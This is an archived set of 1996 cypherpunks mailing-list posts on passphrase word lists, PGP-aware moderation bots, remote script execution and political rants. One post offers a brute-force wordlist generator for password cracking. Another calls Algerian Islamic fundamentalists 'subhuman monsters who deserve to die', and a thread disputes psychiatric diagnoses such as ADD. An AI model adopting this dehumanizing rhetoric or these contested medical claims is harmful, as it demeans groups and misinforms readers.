To: fair@clock.org (Erik E. Fair)
Subject: shell script (Word lists for passphrases)
In-Reply-To: <v02140b3bae01b137a1c6@[199.43.99.154]>
Message-ID: <9607062251.AA17697@vp.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


# From: "Erik E. Fair" (Time Keeper) <fair@clock.org>
# 
# You could just snarf up a week's worth of netnews...

This is trival and, in practice, work great.    
Feed it mail, news, man pages, etc.  
You can cascade results to eliminate huge sorts.
The final grep is my hueristic for english; you can delete or modify it.
Happy hacking.
	strick



cat "$@" |
	tr A-Z a-z |
	grep -v "^message-id:" |
	grep -v "^received:" |
	tr -c "a-zA-Z" "
" |
	grep -v "^$" |
	sort |
	uniq |
	grep -v "[bcdfghjklmnpqrtvwxz][bcdfghjklmnpqrtvwxz][bcdfghjklmnpqrtvwxz][bcdfghjklmnpqrtvwxz]" 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sun, 7 Jul 1996 06:39:23 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <960706155139_428652398@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-07-06 14:25:18 EDT, perry@piermont.com (Perry E.
Metzger) writes:

<< 
 "Perry E. Metzger" writes:
 > 
 > AwakenToMe@aol.com writes:
 > > I have a util that will create a word list starting from
 > > aaaaaaaaaaa on up to anythingggggggg basically you could do every
 > > combination. Let me know if ya want it.
 > 
 > That would really be of great use for doing wordlist crack runs. It
 > must have taken you a long time to write -- generous of you to offer
 > it.
 
 I want to apologize to everyone for being gratuitously nasty
 here. It wasn't called for.
 
  >>
Thats funny. I thought you were being completely serious and I sent you this
file. You are exactly right. it is of GREAT use for doing wordlist crack
runs. Why dont ya check out some realllyyy secure systems and find out what
utils they use to test their own security. I ALWAYS use created segments of
this when trying to brute force my way into my OWN machine. It helps finding
bugs that overwrite the stack..etc. But... apology accepted. You may learn
from it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 7 Jul 1996 09:42:40 +0800
To: Tim Philp <tphilp@bfree.on.ca>
Subject: Re: CCC Crypto Lock
In-Reply-To: <19004146800633@bfree.on.ca>
Message-ID: <Pine.GUL.3.94.960706160110.26242B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Jul 1996, Tim Philp wrote:

> The fact that this patent was issued indicates to me that the patent office
> does not understand computer technology.

Gee. Next you'll be telling us that the US Congress isn't always sensitive
to libertarian issues.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 7 Jul 1996 08:28:05 +0800
To: bryce@digicash.com
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <199607062117.XAA25154@digicash.com>
Message-ID: <199607062132.QAA00782@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


bryce@digicash.com wrote:
> You know, Igor...
> (It has been a few months since I was hot on this idea, but
> hearing about your practical PGP successes has gotten me
> interested again...)
> 
> If you have a moderation bot for a Usenet group (and could it be
> pressed into service as a mailing list handler I wonder?), this

Yes, it can be. When I was writing it I had in mind that I want
to write a general moderation bot that can be _applied_ to USENET.

There is a script processApproved which is called when a message 
should get posted. If you replace the usenet version of processApproved
to mailing list version, you will be done.

> would be a nice tool to start with in order to implement
> full-fledged content/author ratings. 

Well, STUMP is a generic moderation tool.

> Anybody wanna hack a perl
> script or two to produce/consume content/author ratings for
> cypherpunks (it could surely use some!).  We can use my dormant
> mailing list, c2punks@c2.net, as a parallel channel to transmit
> cypherpunk (and maybe other) ratings.

So, what you want is a tool that accepts "unmoderated" cpunks list,
selects messages by authors with high ratings, and forwards only
these into the "filtered" list? That's neat _if_ ratings are done
by people whose tastes are similar to mine..

> Let me know.  We _could_ adopt the ridiculously simple NoCeM
> protocol, or the ever-mutating public key certificates being
> designed in a nearby mailing list, or some protocol of our own.
> (Shouldn't be too hard to come up with an implementable, useful
> protocol.)

?????

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Sun, 7 Jul 1996 08:02:40 +0800
To: cypherpunks@toad.com
Subject: Re: NYT/CyberTimes on CWD article
In-Reply-To: <+cmu.andrew.internet.cypherpunks+olrdBjW00UfAI10EoP@andrew.cmu.edu>
Message-ID: <199607062057.NAA16062@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>http://www.nytimes.com/library/cyber/week/0706patrol-reporters.html
>              "If we believe the encryption scheme has
>              been compromised, we will make another
>              one."

Heh.

It seems that these companies are going to have a problem as long as
they use lists of *excluded* sites.  Forget insight into company
policy; these are global indices of "smut" on the net.  (The lists of
the more liberal companies are probably most attractive to those not
titillated by NOW position papers.)

They have to give you the list, and they have to give you software
that uses it, so there's no way to achieve complete secrecy.  I think
the best they can do is to distribute a list of hashed URLs.

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 7 Jul 1996 10:35:18 +0800
To: bryce@digicash.com
Subject: Re: Need PGP-awareness in common utilities
Message-ID: <v02120d19ae04adc45a15@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:56 7/6/96, bryce@digicash.com wrote:

>Hm.  That might be an interesting addition to my plan, but the
>first step is to generate ratings and to consume them at each
>individual's mail-handling site.  So I, for example, would run a
>script every time I received mail (or every hour, or every day,
>etc) which looked for ratings certificates, PGP-verified them,
>and saved the rating in a database.  Then I would run another
>script (every time I received mail, or every hour, etc.) which
>identified incoming messages and _did_ something to them if
>there were sufficient ratings in the database to merit _doing_
>something to them (e.g. delete, promote to a "well-rated"
>folder, demote to a "poorly-rated" folder, forward to my
>friends, forward to my enemies, etc.).

As has been discussed in numberous previous threads on this topic, even a
passive rating system is very hard to implement. The computer doesn't know
if you hit delete because the post was garbage or because you are running
late on some project. An active rating system is virtually impossible to
implement, given the added workload on the readers.

Good lucky anyway,



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
   Disclaimer: My opinions are my own.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 7 Jul 1996 11:27:14 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607062339.SAA02129@manifold.algebra.com>
Message-ID: <199607070045.RAA24335@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > The doublethink and hypocrisy of modern society is
 > astounding.

 > When the mother (a single mother, as this is California)
 > drops her son off with my friend (also single, of course),
 > she includes several "Ritalin" capsules with instructions on
 > how to dose her son with this depressant/behavior
 > modification drug.

 > My friend ignores these Ritalins, which upsets the Mom
 > greatly the next day when she realizes her son has not been
 > given the tranks that are also known as "Mother's little
 > helpers."

This, of course, is justified by the psychiatric profession's
invention of dozens of bogus diseases, syndromes, and disorders
for children.  These are not caused by any organic pathology, of
course, but are instead defined solely by the child belonging to
the upper five percent of those exhibiting perfectly normal
behaviors which annoy people who have money to hire
psychiatrists.  For kids, that's parents and teachers, and the
afflicted population jumps to ten percent if you happen to be a
kid unlucky enough to be under the care of Mormons.

Refuse to go to a crappy public school and you are suffering from
"School Phobia." Don't jump to follow the orders of the nearest
adult, or disagree with an adult, and its "Oppositional-Defiant"
Disorder.  Not to mention the plethora of ADD/ADDH nonsense that
is used to label any kid who is bored to tears by eight hours a
day of political indoctrination from the NEA and AFT.

Drugs for the poor, and therapy for the rich who can afford it,
are of course the way the psychiatric profession offers to "cure"
these invented maladies.  And since every population of children
will have an upper five percent (ten percent, for Mormons), a
neverending supply of patients is assured.

 > This discipline sets him straight, but it's not something
 > his New Age "supermom" would ever think of doing. Hence the
 > kid throws temper tantrums, acts out, calls her "You fucking
 > asshole" (remember, he's only 8 or so), and so on. So she
 > cranks up his dose of Ritalin and he's zoned out for a
 > while.

Actually, I think calling someone who force-feeds you a
mind-numbing drug "A Fucking Asshole" is, to borrow one of Tim's
favorite words, "Unremarkable." :)

This Soviet-style "Medicalization of Dissent", while applied
primarily to children today, historically has been done by the
psychiatric profession on behalf of anyone who could write their
name on a large check. It wasn't too long ago that they even had
an official mental disorder whose symptoms were "an abnormal
desire for freedom" on the part of a Black man.  Slave owners
must have been just as happy with that as Ritalin-dispensing
parents and teachers are today.

 > The connection with the themes of our list is that this
 > linguistic doublethink is what allows Big Brother's control
 > of our communications and private files to be called by the
 > relatively benign name of "escrow."

Indeed.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 7 Jul 1996 10:18:06 +0800
To: bryce@digicash.com
Subject: Re: more about the usefulness of PGP
In-Reply-To: <199607061957.VAA21682@digicash.com>
Message-ID: <199607062333.SAA02110@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


make sure that you are protected from replay attacks.

a good idea would be to make the server to send cookies by request of
the remote user (you can limit the number of people to whom the server
sends cookies) and make sure that messages without the latest cookie
will NOT be executed.

igor

bryce@digicash.com wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Here's an idea that I always wanted to implement but never did
> yet.  I thought I'd share and if someone else has already done
> it let me have a copy.
> 
> 
> I should be able to execute scripts remotely by sending e-mail
> to an account.  Simple mail-handling scripts at that account
> should check the PGP signature (and timestamp/counter to prevent
> replay/delay attacks) and then pass the contents to a full
> script-language interpreter.
> 
> 
> Perl is a natural choice of interpreter.  Has anybody
> implemented this (hopefully complete with replay/delay 
> prevention)?
> 
> 
> Thanks!
> 
> Bryce
> 
> P.S.  No, actually I can't think of any good use for this
> trick.  But maybe if I had it I would find good uses for it.
> 
> 

> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2i
> Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2
> 
> iQB1AwUBMd7FIEjbHy8sKZitAQHhRQMAmZoekRgmUKSYv89/QrkzRFdTUZLZHK8a
> tlaXLtyJXrOjajxJRVvXWY7Rum6mVXe/4eHTPCGzzWQdXMJB/TJSQeRmTuSiSd9i
> 0DtWcQSmP4q5AFor48NtNvqAOEonf5Vi
> =My90
> -----END PGP SIGNATURE-----
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 7 Jul 1996 10:15:02 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <ae041171000210048a97@[205.199.118.202]>
Message-ID: <199607062339.SAA02129@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


> At 6:17 PM 7/6/96, Alan Olsen wrote:
> >With these sort of tools, we are conditioning our children that it is OK if
> >someone filters their information before they see it. (Without even knowing
> >the *KIND* of information being filtered, because even *THAT* level of
> >knowledge is harmful and/or proprietary.) That it is OK for some parental
> >figure to eliminate all the "nasty" and "awful" information before someone
> >can hurt themselves with it.  That itt is OK to prevent others from viewing
> >information to complex for their childlike minds.

What annoys me to NO END is the laws that require that children under 
age of 13 (?) must always be under parental supervision. These laws 
even say that leaving children unsupervised is child abuse.

Well, i can grant that there are dangers associated with leaving
children alone. But being constantly supervised is way worse. It is
like being in jail.

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 7 Jul 1996 10:24:39 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Radiological Survey Meter (fwd)
Message-ID: <199607062350.TAA03661@nrk.com>
MIME-Version: 1.0
Content-Type: text


If you want such for random #'s....

Tony S. Patti <103514.36@CompuServe.COM> of Cryptosystems Journal
mentioned he'd found a meter as follows:

RESOURCES UN-LTD.

800-810-4070.

Victoreen Model 1 from 1964, in the original box.  
$39.00



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 7 Jul 1996 02:20:00 +0800
To: Rich Graves <vinnie@webstuff.apple.com>
Subject: Re: Net and Terrorism.
Message-ID: <1.5.4.32.19960706205650.002d27d0@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 00:37 05/07/96 -0700, Rich Graves wrote:

>Since the two muslims who used to give a shit about this list seem to have
>left in disgust, I suppose I should register my "That ain't representative
>of Islam...

Not so long ago, when Moslems were fighting the Soviet Union in Afghanistan,
they were heroes to the western world, supplied arms and money enough to
destabilise the whole region. Once the Soviet menace faded, the same
fighters were branded terrorists. Mixed signals like this are responsible
for much of the animosity that one finds in the Islamic world (possibly even
in other parts of the world) against the US.

Arun
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://mahavir.doe.ernet.in/~pinaward/arun.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Jul 1996 07:29:26 +0800
To: cypherpunks@toad.com
Subject: [RANT] Giving Mind Control Drugs to Children
Message-ID: <ae041171000210048a97@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:17 PM 7/6/96, Alan Olsen wrote:


>With these sort of tools, we are conditioning our children that it is OK if
>someone filters their information before they see it. (Without even knowing
>the *KIND* of information being filtered, because even *THAT* level of
>knowledge is harmful and/or proprietary.) That it is OK for some parental
>figure to eliminate all the "nasty" and "awful" information before someone
>can hurt themselves with it.  That itt is OK to prevent others from viewing
>information to complex for their childlike minds.
>
>We are becoming a nation of the babysat.  Anything that our nannys deem
>harmful is hidden away in the bedrooms of the parental units.  And maybe it
>is harmful.  They have to scan through it all day long and look what kind of
>self-righous pricks they have become!

The doublethink and hypocrisy of modern society is astounding.

A friend of mine has an 8-year-old son, whom he has custody of on weekends.
Sometimes his son wants to have his friend stay over Saturday, as kids like
to do.

When the mother (a single mother, as this is California) drops her son off
with my friend (also single, of course), she includes several "Ritalin"
capsules with instructions on how to dose her son with this
depressant/behavior modification drug.

My friend ignores these Ritalins, which upsets the Mom greatly the next day
when she realizes her son has not been given the tranks that are also known
as "Mother's little helpers."

I've been over visiting my friend to see some of this. The Ritalin-sodden
kid arrives like a zombie. When the Ritalin wears off, he's rambunctuous,
but all kids are. My friend Paul has had to discipline him a bit to keep
him from--as the psychobabbles would say--"acting out." This discipline
sets him straight, but it's not something his New Age "supermom" would ever
think of doing. Hence the kid throws temper tantrums, acts out, calls her
"You fucking asshole" (remember, he's only 8 or so), and so on. So she
cranks up his dose of Ritalin and he's zoned out for a while. Frankly, I
think telling the kid that if throws a tantrum he'll get punished for it is
a whole lot more normal--ever notice that a dog smacks her puppies when
they get out of line, or that a cat swats her kittens the same way? It
establishes the rules of the game.

(No, I'm not talking about "child abuse," the sadistic beltings and
lashings which some parents give. However, here in Kalifornia it is
essentially illegal for parents to use corporal punishment. Heavy doses of
drugs are, after all, the California way!)

"Just say no to drugs!" is the mantra of these doublethinkers, as they dose
their kids at school and at home with tranquilizers and behavior
modification drugs. The kids grow up thinking pills are the answer to
everything.

Also in California, the public schools dispense these mind control drugs to
a growing fraction of the school population. Apparently this has become the
largest part of the job of "school nurses." I believe parents are involved
in this dosing regimen, but I would not be surprised if this changes. After
all, such medical procedures as abortion are now handled "discreetly" by
the school nurses, without any requirement that the parent be notified.
Whatever one thinks of abortion, this is surely a strange state of affairs,
where the public school system is taking on such a role and is actively
deceiving a parent.

The connection with the themes of our list is that this linguistic
doublethink is what allows Big Brother's control of our communications and
private files to be called by the relatively benign name of "escrow."

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 06:53:18 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <199607061753.MAA31894@manifold.algebra.com>
Message-ID: <199607061950.VAA21507@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

An entity calling itself ichudov@algebra.com probably wrote 
something like:
>
> My moderation bot STUMP is not only PGP-aware, it is also doing
> a lot of PGP-related things. Among them: 
> 
> 1) For posters who voluntarily chose additional protection, STUMP allows
> only messages with a valid PGP signature to be posted. 
<snip>
> 2) All exchange between my modbot and human moderators is PGP-signed
> (and encrypted when necessary)
<snip>
> 3) All message approved for posting to usenet get signed with Greg
> Rose's PGPMoose program.
<snip>
> 4) There is an additional service for those who post through anonymous
> remailers BUT want to have an identity and reputation.
<snip>  <Great idea!>
> We currently have at least two posters whose real life identities are
> unknown, who use this feature and have sent us their PGP keys.
> 
> STUMP is currently working in production mode seemingly with no problems.


Okay Igor, that is an impressive list of features!  Now what 
I want to know (and what I want other people here to hear) is:
_How_ difficult was it to incorporate these PGP features into
your software?  My guess is that it was a simple matter of
making a couple of system calls to PGP, plus maybe extra 
defense against replay attacks (you _do_ have defense against
replay attacks don't you?) and the fact that you have more
debugging work because you have more features.


Regards,

Bryce



Return-Path: ichudov@manifold.algebra.com
Received: from galaxy.galstar.com (galaxy.galstar.com [204.251.80.2]) by digicash.com (8.6.11/8.6.10) with ESMTP id TAA15575 for <bryce@digicash.com>; Sat, 6 Jul 1996 19:54:16 +0200
Received: from manifold.algebra.com (manifold.algebra.com [204.251.82.89]) by galaxy.galstar.com (8.6.12/8.6.12) with ESMTP id MAA12554; Sat, 6 Jul 1996 12:52:30 -0500
Received: (from ichudov@localhost) by manifold.algebra.com (8.7.5/8.6.11) id MAA31894; Sat, 6 Jul 1996 12:53:02 -0500
Message-Id: <199607061753.MAA31894@manifold.algebra.com>
Subject: Re: Need PGP-awareness in common utilities
To: bryce@digicash.com
Date: Sat, 6 Jul 1996 12:53:02 -0500 (CDT)
Cc: cypherpunks@toad.com, e$@thumper.vmeng.com
Reply-To: ichudov@algebra.com (Igor Chudov)
In-Reply-To: <199607061311.PAA08700@digicash.com> from "bryce@digicash.com" at Jul 6, 96 03:11:48 pm
From: ichudov@algebra.com (Igor Chudov @ home)
X-No-Archive: yes
X-Mailer: ELM [version 2.4 PL24 ME7]
Content-Type: text

bryce@digicash.com wrote:
> I really don't see why programs like majordomo, UseNet
> moderation-bots, and most noticeably the PGP key distribution
> program are PGP-unaware.

My moderation bot STUMP is not only PGP-aware, it is also doing
a lot of PGP-related things. Among them: 

1) For posters who voluntarily chose additional protection, STUMP allows
only messages with a valid PGP signature to be posted. All posts from
these people that do not have a PGP sig or have an invalid sig, are
automatically rejected. It protects them from forgeries.

2) All exchange between my modbot and human moderators is PGP-signed
(and encrypted when necessary), to insure integrity of moderation
email traffic.

3) All message approved for posting to usenet get signed with Greg
Rose's PGPMoose program.

4) There is an additional service for those who post through anonymous
remailers BUT want to have an identity and reputation. The idea is that
they submit their PGP keys to the robomoderator, and later robomod
takes the user id from the PGP key, replacing meaningless anonymous
addresses with their identity.

We currently have at least two posters whose real life identities are
unknown, who use this feature and have sent us their PGP keys.

STUMP is currently working in production mode seemingly with no problems.

For details, look at 

	http://www.algebra.com/~ichudov/usenet/scrm/robomod/robomod.html

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd7Dj0jbHy8sKZitAQGkIAMAxr5F3Lqv2cUBekFz3KRam1H4uE4qKrHx
cv7DwvRUXVX89TK0TFVlt/T3nwD8NBTwMtMG+xnlltHCLcjrSC0gd+3Pu2B8o0nD
0JnXWitvZtAm405YPKaN7sX6hCGGyNOX
=U+4Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 06:51:00 +0800
To: cypherpunks@toad.com
Subject: more about the usefulness of PGP
Message-ID: <199607061957.VAA21682@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's an idea that I always wanted to implement but never did
yet.  I thought I'd share and if someone else has already done
it let me have a copy.


I should be able to execute scripts remotely by sending e-mail
to an account.  Simple mail-handling scripts at that account
should check the PGP signature (and timestamp/counter to prevent
replay/delay attacks) and then pass the contents to a full
script-language interpreter.


Perl is a natural choice of interpreter.  Has anybody
implemented this (hopefully complete with replay/delay 
prevention)?


Thanks!

Bryce

P.S.  No, actually I can't think of any good use for this
trick.  But maybe if I had it I would find good uses for it.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd7FIEjbHy8sKZitAQHhRQMAmZoekRgmUKSYv89/QrkzRFdTUZLZHK8a
tlaXLtyJXrOjajxJRVvXWY7Rum6mVXe/4eHTPCGzzWQdXMJB/TJSQeRmTuSiSd9i
0DtWcQSmP4q5AFor48NtNvqAOEonf5Vi
=My90
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 7 Jul 1996 15:56:32 +0800
To: Arun Mehta <vinnie@webstuff.apple.com>
Subject: Re: Net and Terrorism.
Message-ID: <199607070519.WAA14764@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:03 PM 7/6/96 +0500, Arun Mehta wrote:
> Once the Soviet menace faded, the same
> fighters were branded terrorists. Mixed signals like this are responsible
> for much of the animosity that one finds in the Islamic world (possibly even
> in other parts of the world) against the US.

Some of them *were* and are terrorists.  Some of them are not.  If Islamic
freedom fighters refrained from murdering monks and sixteen year old girls
then people would refrain from calling them terrorists.

It is not the mixed signals, it is the mixed behavior.

The islamic fundamentalists have a thoroughly well deserved reputation
for malevolent evil, for rape and the deliberate individual personal 
murder of women and children as an instrument of terror.

While the guys fighting the Israelis in Lebanon are more or
less honorable men who fight according to the laws of war,
the Islamic fundamentalists in Algeria are simply vicious subhuman 
monsters who deserve to die, each and every one, and their pals in 
Egypt and the Sudan are not much better.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 7 Jul 1996 13:55:14 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607070045.RAA24335@netcom5.netcom.com>
Message-ID: <Pine.LNX.3.94.960706224526.1124A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 6 Jul 1996, Mike Duvos wrote:

> This, of course, is justified by the psychiatric profession's
> invention of dozens of bogus diseases, syndromes, and disorders
> for children.  These are not caused by any organic pathology, of
> course, but are instead defined solely by the child belonging to
> the upper five percent of those exhibiting perfectly normal
> behaviors which annoy people who have money to hire
> psychiatrists.  For kids, that's parents and teachers, and the
> afflicted population jumps to ten percent if you happen to be a
> kid unlucky enough to be under the care of Mormons.

While the psychiatric profession has invented many bogus diseases, that does
not mean that the profession has no credibility.  Remember that psychology is
little more than philosophy.  Abnormal behavior patterns don't necessarily mean
that a child has a disorder or disease.  However, if the child experiences
physical symptoms, then a chemical imbalance in the brain is not that
farfetched.

> 
> Refuse to go to a crappy public school and you are suffering from
> "School Phobia." Don't jump to follow the orders of the nearest
> adult, or disagree with an adult, and its "Oppositional-Defiant"
> Disorder.  Not to mention the plethora of ADD/ADDH nonsense that
> is used to label any kid who is bored to tears by eight hours a
> day of political indoctrination from the NEA and AFT.

First of all, a child is considered to have "school phobia" when the child
refuses to go to school and also has severe anxiety attacks, vomiting, and
nausea.  It's a lot more than refusing to go to a "crappy public school."
Attention Deficit Disorder is hardly nonsense; it's a disorder found to be
partly hereditary and strongly linked with clinical depression.

[...]
> 
> Actually, I think calling someone who force-feeds you a
> mind-numbing drug "A Fucking Asshole" is, to borrow one of Tim's
> favorite words, "Unremarkable." :)
> 
> This Soviet-style "Medicalization of Dissent", while applied
> primarily to children today, historically has been done by the
> psychiatric profession on behalf of anyone who could write their
> name on a large check. It wasn't too long ago that they even had
> an official mental disorder whose symptoms were "an abnormal
> desire for freedom" on the part of a Black man.  Slave owners
> must have been just as happy with that as Ritalin-dispensing
> parents and teachers are today.
> 
>  > The connection with the themes of our list is that this
>  > linguistic doublethink is what allows Big Brother's control
>  > of our communications and private files to be called by the
>  > relatively benign name of "escrow."
> 
> Indeed.

I do agree that Ritalin, like Prozac, is being used inappropriately as a sort
of cure-all drug.  And I also agree that inventing malodies for anything
undesirable to society has Orwellian implications.  Everyone who doesn't agree
with the State is obviously mentally ill and must be "cured."

There are real illnesses, and there are fake ones.  Just because the psychiatic
profession does attribute certain behavior to some non-existent illness doesn't
mean there is any reason to not believe in any psychological maladies.  There
are many severe and very painfull illnesses such as depression,
schizophrenia, obsessive-compulsive disorder, and multiple personality
disorder.  There are also psychological disorders such as anorexia, phobias,
and mood disorders.  It's surprising to me that people consider the Unabomber
"insane" but yet do not believe that many very real mental illnesses and
disorders exist.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMd8rRLZc+sv5siulAQGw4gQAmCLWrkz1Cql7tpPXypzfoGRS6PL2cjIQ
TDa+Q/htq1OV5PjKYo7a06jfMQbpoR+fLmXHi9dc4DOVNfSeExXSEc5Y1RLu7ZvH
lLAmKdefLUZ7BuYAWgPxSYCHzWk9hEqK4A7Vj2rhpDQ7r9TpplQ3otkf0mZyul5X
EIIdF1jGfEY=
=GIrL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 08:15:06 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <199607062013.PAA00038@manifold.algebra.com>
Message-ID: <199607062117.XAA25154@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

You know, Igor...


(It has been a few months since I was hot on this idea, but
hearing about your practical PGP successes has gotten me
interested again...)


If you have a moderation bot for a Usenet group (and could it be
pressed into service as a mailing list handler I wonder?), this
would be a nice tool to start with in order to implement
full-fledged content/author ratings.  Anybody wanna hack a perl
script or two to produce/consume content/author ratings for
cypherpunks (it could surely use some!).  We can use my dormant
mailing list, c2punks@c2.net, as a parallel channel to transmit
cypherpunk (and maybe other) ratings.


Let me know.  We _could_ adopt the ridiculously simple NoCeM
protocol, or the ever-mutating public key certificates being
designed in a nearby mailing list, or some protocol of our own.
(Shouldn't be too hard to come up with an implementable, useful
protocol.)


(And of course we can mix Ecash(tm) in...)


Bryce

P.S.  Look for demo in a second.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd7XyUjbHy8sKZitAQG37QL7Br0vNB2xx4rwyGmXUqP8YYkY3GV5Q2Cv
Ut0PmkdKTlmDkM0nFzZEYTuOhvPwabglpq385Dzp6vjUratILMhOQLulqueumj/C
zOz4KcUEPqinK7KMg5ZnkZPy6d02goh2
=OBSL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 7 Jul 1996 16:02:32 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607062339.SAA02129@manifold.algebra.com>
Message-ID: <52FoqD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> What annoys me to NO END is the laws that require that children under
> age of 13 (?) must always be under parental supervision. These laws
> even say that leaving children unsupervised is child abuse.

Igor, it was safe to leave childred alone in Russia because in Russia
perverts and child molesters were jailed and/or castrated.  Here in the
U.S. perverts have 'civil rights'. Hence the children must be protected
from them.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sun, 7 Jul 1996 14:38:45 +0800
